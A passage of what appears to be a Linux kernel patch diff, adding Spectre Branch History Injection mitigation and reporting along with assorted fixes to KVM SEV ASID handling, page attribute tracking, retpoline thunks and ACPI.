++	if (bhi_mitigation == BHI_MITIGATION_AUTO)
++		return;
++
++	/* Mitigate syscalls when the mitigation is forced =on */
++	setup_force_cpu_cap(X86_FEATURE_CLEAR_BHB_LOOP);
++	pr_info("Spectre BHI mitigation: SW BHB clearing on syscall\n");
++}
++
+ static void __init spectre_v2_select_mitigation(void)
+ {
+ 	enum spectre_v2_mitigation_cmd cmd = spectre_v2_parse_cmdline();
+@@ -1694,6 +1767,9 @@ static void __init spectre_v2_select_mitigation(void)
+ 	    mode == SPECTRE_V2_RETPOLINE)
+ 		spec_ctrl_disable_kernel_rrsba();
+ 
++	if (boot_cpu_has(X86_BUG_BHI))
++		bhi_select_mitigation();
++
+ 	spectre_v2_enabled = mode;
+ 	pr_info("%s\n", spectre_v2_strings[mode]);
+ 
+@@ -2674,15 +2750,15 @@ static char *stibp_state(void)
+ 
+ 	switch (spectre_v2_user_stibp) {
+ 	case SPECTRE_V2_USER_NONE:
+-		return ", STIBP: disabled";
++		return "; STIBP: disabled";
+ 	case SPECTRE_V2_USER_STRICT:
+-		return ", STIBP: forced";
++		return "; STIBP: forced";
+ 	case SPECTRE_V2_USER_STRICT_PREFERRED:
+-		return ", STIBP: always-on";
++		return "; STIBP: always-on";
+ 	case SPECTRE_V2_USER_PRCTL:
+ 	case SPECTRE_V2_USER_SECCOMP:
+ 		if (static_key_enabled(&switch_to_cond_stibp))
+-			return ", STIBP: conditional";
++			return "; STIBP: conditional";
+ 	}
+ 	return "";
+ }
+@@ -2691,10 +2767,10 @@ static char *ibpb_state(void)
+ {
+ 	if (boot_cpu_has(X86_FEATURE_IBPB)) {
+ 		if (static_key_enabled(&switch_mm_always_ibpb))
+-			return ", IBPB: always-on";
++			return "; IBPB: always-on";
+ 		if (static_key_enabled(&switch_mm_cond_ibpb))
+-			return ", IBPB: conditional";
+-		return ", IBPB: disabled";
++			return "; IBPB: conditional";
++		return "; IBPB: disabled";
+ 	}
+ 	return "";
+ }
+@@ -2704,14 +2780,31 @@ static char *pbrsb_eibrs_state(void)
+ 	if (boot_cpu_has_bug(X86_BUG_EIBRS_PBRSB)) {
+ 		if (boot_cpu_has(X86_FEATURE_RSB_VMEXIT_LITE) ||
+ 		    boot_cpu_has(X86_FEATURE_RSB_VMEXIT))
+-			return ", PBRSB-eIBRS: SW sequence";
++			return "; PBRSB-eIBRS: SW sequence";
+ 		else
+-			return ", PBRSB-eIBRS: Vulnerable";
++			return "; PBRSB-eIBRS: Vulnerable";
+ 	} else {
+-		return ", PBRSB-eIBRS: Not affected";
++		return "; PBRSB-eIBRS: Not affected";
+ 	}
+ }
+ 
++static const char * const spectre_bhi_state(void)
++{
++	if (!boot_cpu_has_bug(X86_BUG_BHI))
++		return "; BHI: Not affected";
++	else if  (boot_cpu_has(X86_FEATURE_CLEAR_BHB_HW))
++		return "; BHI: BHI_DIS_S";
++	else if  (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP))
++		return "; BHI: SW loop, KVM: SW loop";
++	else if (boot_cpu_has(X86_FEATURE_RETPOLINE) &&
++		 !(x86_read_arch_cap_msr() & ARCH_CAP_RRSBA))
++		return "; BHI: Retpoline";
++	else if  (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT))
++		return "; BHI: Syscall hardening, KVM: SW loop";
++
++	return "; BHI: Vulnerable (Syscall hardening enabled)";
++}
++
+ static ssize_t spectre_v2_show_state(char *buf)
+ {
+ 	if (spectre_v2_enabled == SPECTRE_V2_LFENCE)
+@@ -2724,13 +2817,15 @@ static ssize_t spectre_v2_show_state(char *buf)
+ 	    spectre_v2_enabled == SPECTRE_V2_EIBRS_LFENCE)
+ 		return sysfs_emit(buf, "Vulnerable: eIBRS+LFENCE with unprivileged eBPF and SMT\n");
+ 
+-	return sysfs_emit(buf, "%s%s%s%s%s%s%s\n",
++	return sysfs_emit(buf, "%s%s%s%s%s%s%s%s\n",
+ 			  spectre_v2_strings[spectre_v2_enabled],
+ 			  ibpb_state(),
+-			  boot_cpu_has(X86_FEATURE_USE_IBRS_FW) ? ", IBRS_FW" : "",
++			  boot_cpu_has(X86_FEATURE_USE_IBRS_FW) ? "; IBRS_FW" : "",
+ 			  stibp_state(),
+-			  boot_cpu_has(X86_FEATURE_RSB_CTXSW) ? ", RSB filling" : "",
++			  boot_cpu_has(X86_FEATURE_RSB_CTXSW) ? "; RSB filling" : "",
+ 			  pbrsb_eibrs_state(),
++			  spectre_bhi_state(),
++			  /* this should always be at the end */
+ 			  spectre_v2_module_string());
+ }
+ 
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index ca243d7ba0ea5..08fe77d2a3f90 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -1144,6 +1144,7 @@ static void identify_cpu_without_cpuid(struct cpuinfo_x86 *c)
+ #define NO_SPECTRE_V2		BIT(8)
+ #define NO_MMIO			BIT(9)
+ #define NO_EIBRS_PBRSB		BIT(10)
++#define NO_BHI			BIT(11)
+ 
+ #define VULNWL(vendor, family, model, whitelist)	\
+ 	X86_MATCH_VENDOR_FAM_MODEL(vendor, family, model, whitelist)
+@@ -1206,18 +1207,18 @@ static const __initconst struct x86_cpu_id cpu_vuln_whitelist[] = {
+ 	VULNWL_INTEL(ATOM_TREMONT_D,		NO_ITLB_MULTIHIT | NO_EIBRS_PBRSB),
+ 
+ 	/* AMD Family 0xf - 0x12 */
+-	VULNWL_AMD(0x0f,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO),
+-	VULNWL_AMD(0x10,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO),
+-	VULNWL_AMD(0x11,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO),
+-	VULNWL_AMD(0x12,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO),
++	VULNWL_AMD(0x0f,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_BHI),
++	VULNWL_AMD(0x10,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_BHI),
++	VULNWL_AMD(0x11,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_BHI),
++	VULNWL_AMD(0x12,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_BHI),
+ 
+ 	/* FAMILY_ANY must be last, otherwise 0x0f - 0x12 matches won't work */
+-	VULNWL_AMD(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_EIBRS_PBRSB),
+-	VULNWL_HYGON(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_EIBRS_PBRSB),
++	VULNWL_AMD(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_EIBRS_PBRSB | NO_BHI),
++	VULNWL_HYGON(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_EIBRS_PBRSB | NO_BHI),
+ 
+ 	/* Zhaoxin Family 7 */
+-	VULNWL(CENTAUR,	7, X86_MODEL_ANY,	NO_SPECTRE_V2 | NO_SWAPGS | NO_MMIO),
+-	VULNWL(ZHAOXIN,	7, X86_MODEL_ANY,	NO_SPECTRE_V2 | NO_SWAPGS | NO_MMIO),
++	VULNWL(CENTAUR,	7, X86_MODEL_ANY,	NO_SPECTRE_V2 | NO_SWAPGS | NO_MMIO | NO_BHI),
++	VULNWL(ZHAOXIN,	7, X86_MODEL_ANY,	NO_SPECTRE_V2 | NO_SWAPGS | NO_MMIO | NO_BHI),
+ 	{}
+ };
+ 
+@@ -1454,6 +1455,13 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	if (vulnerable_to_rfds(ia32_cap))
+ 		setup_force_cpu_bug(X86_BUG_RFDS);
+ 
++	/* When virtualized, eIBRS could be hidden, assume vulnerable */
++	if (!(ia32_cap & ARCH_CAP_BHI_NO) &&
++	    !cpu_matches(cpu_vuln_whitelist, NO_BHI) &&
++	    (boot_cpu_has(X86_FEATURE_IBRS_ENHANCED) ||
++	     boot_cpu_has(X86_FEATURE_HYPERVISOR)))
++		setup_force_cpu_bug(X86_BUG_BHI);
++
+ 	if (cpu_matches(cpu_vuln_whitelist, NO_MELTDOWN))
+ 		return;
+ 
+diff --git a/arch/x86/kernel/cpu/mce/core.c b/arch/x86/kernel/cpu/mce/core.c
+index cad6ea1911e9b..359218bc1b34b 100644
+--- a/arch/x86/kernel/cpu/mce/core.c
++++ b/arch/x86/kernel/cpu/mce/core.c
+@@ -2471,12 +2471,14 @@ static ssize_t set_bank(struct device *s, struct device_attribute *attr,
+ 		return -EINVAL;
+ 
+ 	b = &per_cpu(mce_banks_array, s->id)[bank];
+-
+ 	if (!b->init)
+ 		return -ENODEV;
+ 
+ 	b->ctl = new;
++
++	mutex_lock(&mce_sysfs_mutex);
+ 	mce_restart();
++	mutex_unlock(&mce_sysfs_mutex);
+ 
+ 	return size;
+ }
+diff --git a/arch/x86/kernel/cpu/scattered.c b/arch/x86/kernel/cpu/scattered.c
+index fc01f81f6e2a3..28c357cf7c75e 100644
+--- a/arch/x86/kernel/cpu/scattered.c
++++ b/arch/x86/kernel/cpu/scattered.c
+@@ -28,6 +28,7 @@ static const struct cpuid_bit cpuid_bits[] = {
+ 	{ X86_FEATURE_EPB,		CPUID_ECX,  3, 0x00000006, 0 },
+ 	{ X86_FEATURE_INTEL_PPIN,	CPUID_EBX,  0, 0x00000007, 1 },
+ 	{ X86_FEATURE_RRSBA_CTRL,	CPUID_EDX,  2, 0x00000007, 2 },
++	{ X86_FEATURE_BHI_CTRL,		CPUID_EDX,  4, 0x00000007, 2 },
+ 	{ X86_FEATURE_CQM_LLC,		CPUID_EDX,  1, 0x0000000f, 0 },
+ 	{ X86_FEATURE_CQM_OCCUP_LLC,	CPUID_EDX,  0, 0x0000000f, 1 },
+ 	{ X86_FEATURE_CQM_MBM_TOTAL,	CPUID_EDX,  1, 0x0000000f, 1 },
+@@ -46,6 +47,7 @@ static const struct cpuid_bit cpuid_bits[] = {
+ 	{ X86_FEATURE_MBA,		CPUID_EBX,  6, 0x80000008, 0 },
+ 	{ X86_FEATURE_PERFMON_V2,	CPUID_EAX,  0, 0x80000022, 0 },
+ 	{ X86_FEATURE_AMD_LBR_V2,	CPUID_EAX,  1, 0x80000022, 0 },
++	{ X86_FEATURE_AMD_LBR_PMC_FREEZE,	CPUID_EAX,  2, 0x80000022, 0 },
+ 	{ 0, 0, 0, 0, 0 }
+ };
+ 
+diff --git a/arch/x86/kernel/setup.c b/arch/x86/kernel/setup.c
+index d1ffac9ad611d..18a034613d94d 100644
+--- a/arch/x86/kernel/setup.c
++++ b/arch/x86/kernel/setup.c
+@@ -33,6 +33,7 @@
+ #include <asm/numa.h>
+ #include <asm/bios_ebda.h>
+ #include <asm/bugs.h>
++#include <asm/coco.h>
+ #include <asm/cpu.h>
+ #include <asm/efi.h>
+ #include <asm/gart.h>
+@@ -1132,6 +1133,7 @@ void __init setup_arch(char **cmdline_p)
+ 	 * memory size.
+ 	 */
+ 	sev_setup_arch();
++	cc_random_init();
+ 
+ 	efi_fake_memmap();
+ 	efi_find_mirror();
+diff --git a/arch/x86/kvm/reverse_cpuid.h b/arch/x86/kvm/reverse_cpuid.h
+index 7c8e2b20a13b0..e43909d6504af 100644
+--- a/arch/x86/kvm/reverse_cpuid.h
++++ b/arch/x86/kvm/reverse_cpuid.h
+@@ -42,7 +42,7 @@ enum kvm_only_cpuid_leafs {
+ #define X86_FEATURE_IPRED_CTRL		KVM_X86_FEATURE(CPUID_7_2_EDX, 1)
+ #define KVM_X86_FEATURE_RRSBA_CTRL	KVM_X86_FEATURE(CPUID_7_2_EDX, 2)
+ #define X86_FEATURE_DDPD_U		KVM_X86_FEATURE(CPUID_7_2_EDX, 3)
+-#define X86_FEATURE_BHI_CTRL		KVM_X86_FEATURE(CPUID_7_2_EDX, 4)
++#define KVM_X86_FEATURE_BHI_CTRL	KVM_X86_FEATURE(CPUID_7_2_EDX, 4)
+ #define X86_FEATURE_MCDT_NO		KVM_X86_FEATURE(CPUID_7_2_EDX, 5)
+ 
+ struct cpuid_reg {
+@@ -83,10 +83,12 @@ static const struct cpuid_reg reverse_cpuid[] = {
+  */
+ static __always_inline void reverse_cpuid_check(unsigned int x86_leaf)
+ {
++	BUILD_BUG_ON(NR_CPUID_WORDS != NCAPINTS);
+ 	BUILD_BUG_ON(x86_leaf == CPUID_LNX_1);
+ 	BUILD_BUG_ON(x86_leaf == CPUID_LNX_2);
+ 	BUILD_BUG_ON(x86_leaf == CPUID_LNX_3);
+ 	BUILD_BUG_ON(x86_leaf == CPUID_LNX_4);
++	BUILD_BUG_ON(x86_leaf == CPUID_LNX_5);
+ 	BUILD_BUG_ON(x86_leaf >= ARRAY_SIZE(reverse_cpuid));
+ 	BUILD_BUG_ON(reverse_cpuid[x86_leaf].function == 0);
+ }
+@@ -104,6 +106,7 @@ static __always_inline u32 __feature_translate(int x86_feature)
+ 	KVM_X86_TRANSLATE_FEATURE(SGX1);
+ 	KVM_X86_TRANSLATE_FEATURE(SGX2);
+ 	KVM_X86_TRANSLATE_FEATURE(RRSBA_CTRL);
++	KVM_X86_TRANSLATE_FEATURE(BHI_CTRL);
+ 	default:
+ 		return x86_feature;
+ 	}
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index 3dc0ee1fe9db9..d8e192ad59538 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -76,9 +76,10 @@ struct enc_region {
+ };
+ 
+ /* Called with the sev_bitmap_lock held, or on shutdown  */
+-static int sev_flush_asids(int min_asid, int max_asid)
++static int sev_flush_asids(unsigned int min_asid, unsigned int max_asid)
+ {
+-	int ret, asid, error = 0;
++	int ret, error = 0;
++	unsigned int asid;
+ 
+ 	/* Check if there are any ASIDs to reclaim before performing a flush */
+ 	asid = find_next_bit(sev_reclaim_asid_bitmap, nr_asids, min_asid);
+@@ -108,7 +109,7 @@ static inline bool is_mirroring_enc_context(struct kvm *kvm)
+ }
+ 
+ /* Must be called with the sev_bitmap_lock held */
+-static bool __sev_recycle_asids(int min_asid, int max_asid)
++static bool __sev_recycle_asids(unsigned int min_asid, unsigned int max_asid)
+ {
+ 	if (sev_flush_asids(min_asid, max_asid))
+ 		return false;
+@@ -135,8 +136,20 @@ static void sev_misc_cg_uncharge(struct kvm_sev_info *sev)
+ 
+ static int sev_asid_new(struct kvm_sev_info *sev)
+ {
+-	int asid, min_asid, max_asid, ret;
++	/*
++	 * SEV-enabled guests must use asid from min_sev_asid to max_sev_asid.
++	 * SEV-ES-enabled guest can use from 1 to min_sev_asid - 1.
++	 * Note: min ASID can end up larger than the max if basic SEV support is
++	 * effectively disabled by disallowing use of ASIDs for SEV guests.
++	 */
++	unsigned int min_asid = sev->es_active ? 1 : min_sev_asid;
++	unsigned int max_asid = sev->es_active ? min_sev_asid - 1 : max_sev_asid;
++	unsigned int asid;
+ 	bool retry = true;
++	int ret;
++
++	if (min_asid > max_asid)
++		return -ENOTTY;
+ 
+ 	WARN_ON(sev->misc_cg);
+ 	sev->misc_cg = get_current_misc_cg();
+@@ -149,12 +162,6 @@ static int sev_asid_new(struct kvm_sev_info *sev)
+ 
+ 	mutex_lock(&sev_bitmap_lock);
+ 
+-	/*
+-	 * SEV-enabled guests must use asid from min_sev_asid to max_sev_asid.
+-	 * SEV-ES-enabled guest can use from 1 to min_sev_asid - 1.
+-	 */
+-	min_asid = sev->es_active ? 1 : min_sev_asid;
+-	max_asid = sev->es_active ? min_sev_asid - 1 : max_sev_asid;
+ again:
+ 	asid = find_next_zero_bit(sev_asid_bitmap, max_asid + 1, min_asid);
+ 	if (asid > max_asid) {
+@@ -179,7 +186,7 @@ static int sev_asid_new(struct kvm_sev_info *sev)
+ 	return ret;
+ }
+ 
+-static int sev_get_asid(struct kvm *kvm)
++static unsigned int sev_get_asid(struct kvm *kvm)
+ {
+ 	struct kvm_sev_info *sev = &to_kvm_svm(kvm)->sev_info;
+ 
+@@ -276,8 +283,8 @@ static int sev_guest_init(struct kvm *kvm, struct kvm_sev_cmd *argp)
+ 
+ static int sev_bind_asid(struct kvm *kvm, unsigned int handle, int *error)
+ {
++	unsigned int asid = sev_get_asid(kvm);
+ 	struct sev_data_activate activate;
+-	int asid = sev_get_asid(kvm);
+ 	int ret;
+ 
+ 	/* activate ASID on the given handle */
+@@ -2213,11 +2220,10 @@ void __init sev_hardware_setup(void)
+ 		goto out;
+ 	}
+ 
+-	sev_asid_count = max_sev_asid - min_sev_asid + 1;
+-	if (misc_cg_set_capacity(MISC_CG_RES_SEV, sev_asid_count))
+-		goto out;
+-
+-	pr_info("SEV supported: %u ASIDs\n", sev_asid_count);
++	if (min_sev_asid <= max_sev_asid) {
++		sev_asid_count = max_sev_asid - min_sev_asid + 1;
++		WARN_ON_ONCE(misc_cg_set_capacity(MISC_CG_RES_SEV, sev_asid_count));
++	}
+ 	sev_supported = true;
+ 
+ 	/* SEV-ES support requested? */
+@@ -2242,13 +2248,21 @@ void __init sev_hardware_setup(void)
+ 		goto out;
+ 
+ 	sev_es_asid_count = min_sev_asid - 1;
+-	if (misc_cg_set_capacity(MISC_CG_RES_SEV_ES, sev_es_asid_count))
+-		goto out;
+-
+-	pr_info("SEV-ES supported: %u ASIDs\n", sev_es_asid_count);
++	WARN_ON_ONCE(misc_cg_set_capacity(MISC_CG_RES_SEV_ES, sev_es_asid_count));
+ 	sev_es_supported = true;
+ 
+ out:
++	if (boot_cpu_has(X86_FEATURE_SEV))
++		pr_info("SEV %s (ASIDs %u - %u)\n",
++			sev_supported ? min_sev_asid <= max_sev_asid ? "enabled" :
++								       "unusable" :
++								       "disabled",
++			min_sev_asid, max_sev_asid);
++	if (boot_cpu_has(X86_FEATURE_SEV_ES))
++		pr_info("SEV-ES %s (ASIDs %u - %u)\n",
++			sev_es_supported ? "enabled" : "disabled",
++			min_sev_asid > 1 ? 1 : 0, min_sev_asid - 1);
++
+ 	sev_enabled = sev_supported;
+ 	sev_es_enabled = sev_es_supported;
+ #endif
+@@ -2287,7 +2301,7 @@ int sev_cpu_init(struct svm_cpu_data *sd)
+  */
+ static void sev_flush_encrypted_page(struct kvm_vcpu *vcpu, void *va)
+ {
+-	int asid = to_kvm_svm(vcpu->kvm)->sev_info.asid;
++	unsigned int asid = sev_get_asid(vcpu->kvm);
+ 
+ 	/*
+ 	 * Note!  The address must be a kernel address, as regular page walk
+@@ -2608,7 +2622,7 @@ void sev_es_unmap_ghcb(struct vcpu_svm *svm)
+ void pre_sev_run(struct vcpu_svm *svm, int cpu)
+ {
+ 	struct svm_cpu_data *sd = per_cpu_ptr(&svm_data, cpu);
+-	int asid = sev_get_asid(svm->vcpu.kvm);
++	unsigned int asid = sev_get_asid(svm->vcpu.kvm);
+ 
+ 	/* Assign the asid allocated with this SEV guest */
+ 	svm->asid = asid;
+diff --git a/arch/x86/kvm/trace.h b/arch/x86/kvm/trace.h
+index bc25589ad5886..6c1dcf44c4fa3 100644
+--- a/arch/x86/kvm/trace.h
++++ b/arch/x86/kvm/trace.h
+@@ -729,13 +729,13 @@ TRACE_EVENT(kvm_nested_intr_vmexit,
+  * Tracepoint for nested #vmexit because of interrupt pending
+  */
+ TRACE_EVENT(kvm_invlpga,
+-	    TP_PROTO(__u64 rip, int asid, u64 address),
++	    TP_PROTO(__u64 rip, unsigned int asid, u64 address),
+ 	    TP_ARGS(rip, asid, address),
+ 
+ 	TP_STRUCT__entry(
+-		__field(	__u64,	rip	)
+-		__field(	int,	asid	)
+-		__field(	__u64,	address	)
++		__field(	__u64,		rip	)
++		__field(	unsigned int,	asid	)
++		__field(	__u64,		address	)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -744,7 +744,7 @@ TRACE_EVENT(kvm_invlpga,
+ 		__entry->address	=	address;
+ 	),
+ 
+-	TP_printk("rip: 0x%016llx asid: %d address: 0x%016llx",
++	TP_printk("rip: 0x%016llx asid: %u address: 0x%016llx",
+ 		  __entry->rip, __entry->asid, __entry->address)
+ );
+ 
+diff --git a/arch/x86/kvm/vmx/vmenter.S b/arch/x86/kvm/vmx/vmenter.S
+index 0b2cad66dee12..b4f8937226c21 100644
+--- a/arch/x86/kvm/vmx/vmenter.S
++++ b/arch/x86/kvm/vmx/vmenter.S
+@@ -242,6 +242,8 @@ SYM_INNER_LABEL(vmx_vmexit, SYM_L_GLOBAL)
+ 
+ 	call vmx_spec_ctrl_restore_host
+ 
++	CLEAR_BRANCH_HISTORY_VMEXIT
++
+ 	/* Put return value in AX */
+ 	mov %_ASM_BX, %_ASM_AX
+ 
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 0e6e63a8f0949..f724765032bc4 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -1614,7 +1614,7 @@ static unsigned int num_msr_based_features;
+ 	 ARCH_CAP_PSCHANGE_MC_NO | ARCH_CAP_TSX_CTRL_MSR | ARCH_CAP_TAA_NO | \
+ 	 ARCH_CAP_SBDR_SSDP_NO | ARCH_CAP_FBSDP_NO | ARCH_CAP_PSDP_NO | \
+ 	 ARCH_CAP_FB_CLEAR | ARCH_CAP_RRSBA | ARCH_CAP_PBRSB_NO | ARCH_CAP_GDS_NO | \
+-	 ARCH_CAP_RFDS_NO | ARCH_CAP_RFDS_CLEAR)
++	 ARCH_CAP_RFDS_NO | ARCH_CAP_RFDS_CLEAR | ARCH_CAP_BHI_NO)
+ 
+ static u64 kvm_get_arch_capabilities(void)
+ {
+diff --git a/arch/x86/lib/retpoline.S b/arch/x86/lib/retpoline.S
+index 65c5c44f006bc..055955c9bfcb7 100644
+--- a/arch/x86/lib/retpoline.S
++++ b/arch/x86/lib/retpoline.S
+@@ -110,6 +110,7 @@ SYM_START(srso_alias_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
+ 	ret
+ 	int3
+ SYM_FUNC_END(srso_alias_untrain_ret)
++__EXPORT_THUNK(srso_alias_untrain_ret)
+ #endif
+ 
+ SYM_START(srso_alias_safe_ret, SYM_L_GLOBAL, SYM_A_NONE)
+@@ -252,9 +253,7 @@ SYM_CODE_START(srso_return_thunk)
+ SYM_CODE_END(srso_return_thunk)
+ 
+ SYM_FUNC_START(entry_untrain_ret)
+-	ALTERNATIVE_2 "jmp retbleed_untrain_ret", \
+-		      "jmp srso_untrain_ret", X86_FEATURE_SRSO, \
+-		      "jmp srso_alias_untrain_ret", X86_FEATURE_SRSO_ALIAS
++	ALTERNATIVE "jmp retbleed_untrain_ret", "jmp srso_untrain_ret", X86_FEATURE_SRSO
+ SYM_FUNC_END(entry_untrain_ret)
+ __EXPORT_THUNK(entry_untrain_ret)
+ 
+@@ -262,6 +261,7 @@ SYM_CODE_START(__x86_return_thunk)
+ 	UNWIND_HINT_FUNC
+ 	ANNOTATE_NOENDBR
+ 	ANNOTATE_UNRET_SAFE
++	ANNOTATE_NOENDBR
+ 	ret
+ 	int3
+ SYM_CODE_END(__x86_return_thunk)
+diff --git a/arch/x86/mm/ident_map.c b/arch/x86/mm/ident_map.c
+index f50cc210a9818..968d7005f4a72 100644
+--- a/arch/x86/mm/ident_map.c
++++ b/arch/x86/mm/ident_map.c
+@@ -26,31 +26,18 @@ static int ident_pud_init(struct x86_mapping_info *info, pud_t *pud_page,
+ 	for (; addr < end; addr = next) {
+ 		pud_t *pud = pud_page + pud_index(addr);
+ 		pmd_t *pmd;
+-		bool use_gbpage;
+ 
+ 		next = (addr & PUD_MASK) + PUD_SIZE;
+ 		if (next > end)
+ 			next = end;
+ 
+-		/* if this is already a gbpage, this portion is already mapped */
+-		if (pud_large(*pud))
+-			continue;
+-
+-		/* Is using a gbpage allowed? */
+-		use_gbpage = info->direct_gbpages;
+-
+-		/* Don't use gbpage if it maps more than the requested region. */
+-		/* at the begining: */
+-		use_gbpage &= ((addr & ~PUD_MASK) == 0);
+-		/* ... or at the end: */
+-		use_gbpage &= ((next & ~PUD_MASK) == 0);
+-
+-		/* Never overwrite existing mappings */
+-		use_gbpage &= !pud_present(*pud);
+-
+-		if (use_gbpage) {
++		if (info->direct_gbpages) {
+ 			pud_t pudval;
+ 
++			if (pud_present(*pud))
++				continue;
++
++			addr &= PUD_MASK;
+ 			pudval = __pud((addr - info->offset) | info->page_flag);
+ 			set_pud(pud, pudval);
+ 			continue;
+diff --git a/arch/x86/mm/pat/memtype.c b/arch/x86/mm/pat/memtype.c
+index 66a209f7eb86d..d6fe9093ea919 100644
+--- a/arch/x86/mm/pat/memtype.c
++++ b/arch/x86/mm/pat/memtype.c
+@@ -997,6 +997,38 @@ static void free_pfn_range(u64 paddr, unsigned long size)
+ 		memtype_free(paddr, paddr + size);
+ }
+ 
++static int get_pat_info(struct vm_area_struct *vma, resource_size_t *paddr,
++		pgprot_t *pgprot)
++{
++	unsigned long prot;
++
++	VM_WARN_ON_ONCE(!(vma->vm_flags & VM_PAT));
++
++	/*
++	 * We need the starting PFN and cachemode used for track_pfn_remap()
++	 * that covered the whole VMA. For most mappings, we can obtain that
++	 * information from the page tables. For COW mappings, we might now
++	 * suddenly have anon folios mapped and follow_phys() will fail.
++	 *
++	 * Fallback to using vma->vm_pgoff, see remap_pfn_range_notrack(), to
++	 * detect the PFN. If we need the cachemode as well, we're out of luck
++	 * for now and have to fail fork().
++	 */
++	if (!follow_phys(vma, vma->vm_start, 0, &prot, paddr)) {
++		if (pgprot)
++			*pgprot = __pgprot(prot);
++		return 0;
++	}
++	if (is_cow_mapping(vma->vm_flags)) {
++		if (pgprot)
++			return -EINVAL;
++		*paddr = (resource_size_t)vma->vm_pgoff << PAGE_SHIFT;
++		return 0;
++	}
++	WARN_ON_ONCE(1);
++	return -EINVAL;
++}
++
+ /*
+  * track_pfn_copy is called when vma that is covering the pfnmap gets
+  * copied through copy_page_range().
+@@ -1007,20 +1039,13 @@ static void free_pfn_range(u64 paddr, unsigned long size)
+ int track_pfn_copy(struct vm_area_struct *vma)
+ {
+ 	resource_size_t paddr;
+-	unsigned long prot;
+ 	unsigned long vma_size = vma->vm_end - vma->vm_start;
+ 	pgprot_t pgprot;
+ 
+ 	if (vma->vm_flags & VM_PAT) {
+-		/*
+-		 * reserve the whole chunk covered by vma. We need the
+-		 * starting address and protection from pte.
+-		 */
+-		if (follow_phys(vma, vma->vm_start, 0, &prot, &paddr)) {
+-			WARN_ON_ONCE(1);
++		if (get_pat_info(vma, &paddr, &pgprot))
+ 			return -EINVAL;
+-		}
+-		pgprot = __pgprot(prot);
++		/* reserve the whole chunk covered by vma. */
+ 		return reserve_pfn_range(paddr, vma_size, &pgprot, 1);
+ 	}
+ 
+@@ -1095,7 +1120,6 @@ void untrack_pfn(struct vm_area_struct *vma, unsigned long pfn,
+ 		 unsigned long size)
+ {
+ 	resource_size_t paddr;
+-	unsigned long prot;
+ 
+ 	if (vma && !(vma->vm_flags & VM_PAT))
+ 		return;
+@@ -1103,11 +1127,8 @@ void untrack_pfn(struct vm_area_struct *vma, unsigned long pfn,
+ 	/* free the chunk starting from pfn or the whole chunk */
+ 	paddr = (resource_size_t)pfn << PAGE_SHIFT;
+ 	if (!paddr && !size) {
+-		if (follow_phys(vma, vma->vm_start, 0, &prot, &paddr)) {
+-			WARN_ON_ONCE(1);
++		if (get_pat_info(vma, &paddr, NULL))
+ 			return;
+-		}
+-
+ 		size = vma->vm_end - vma->vm_start;
+ 	}
+ 	free_pfn_range(paddr, size);
+diff --git a/drivers/acpi/acpica/dbnames.c b/drivers/acpi/acpica/dbnames.c
+index b91155ea9c343..c9131259f717b 100644
+--- a/drivers/acpi/acpica/dbnames.c
++++ b/drivers/acpi/acpica/dbnames.c
+@@ -550,8 +550,12 @@ acpi_db_walk_for_fields(acpi_handle obj_handle,
+ 	ACPI_FREE(buffer.pointer);
+ 
+ 	buffer.length = ACPI_ALLOCATE_LOCAL_BUFFER;
+-	acpi_evaluate_object(obj_handle, NULL, NULL, &buffer);
+-
++	status = acpi_evaluate_object(obj_handle, NULL, NULL, &buffer);
++	if (ACPI_FAILURE(status)) {
++		acpi_os_printf("Could Not evaluate object %p\n",
++			       obj_handle);
++		return (AE_OK);
++	}
+ 	/*
+ 	 * Since this is a field unit, surround the output in braces
+ 	 */
+diff --git a/drivers/ata/sata_mv.c b/drivers/ata/sata_mv.c
+index 17f9062b0eaa5..9cf540017a5e5 100644
+--- a/drivers/ata/sata_mv.c
++++ b/drivers/ata/sata_mv.c
+@@ -787,37 +787,6 @@ static const struct ata_port_info mv_port_info[] = {
+ 	},
+ };
+ 
+-static const struct pci_device_id mv_pci_tbl[] = {
+-	{ PCI_VDEVICE(MARVELL, 0x5040), chip_504x },
+-	{ PCI_VDEVICE(MARVELL, 0x5041), chip_504x },
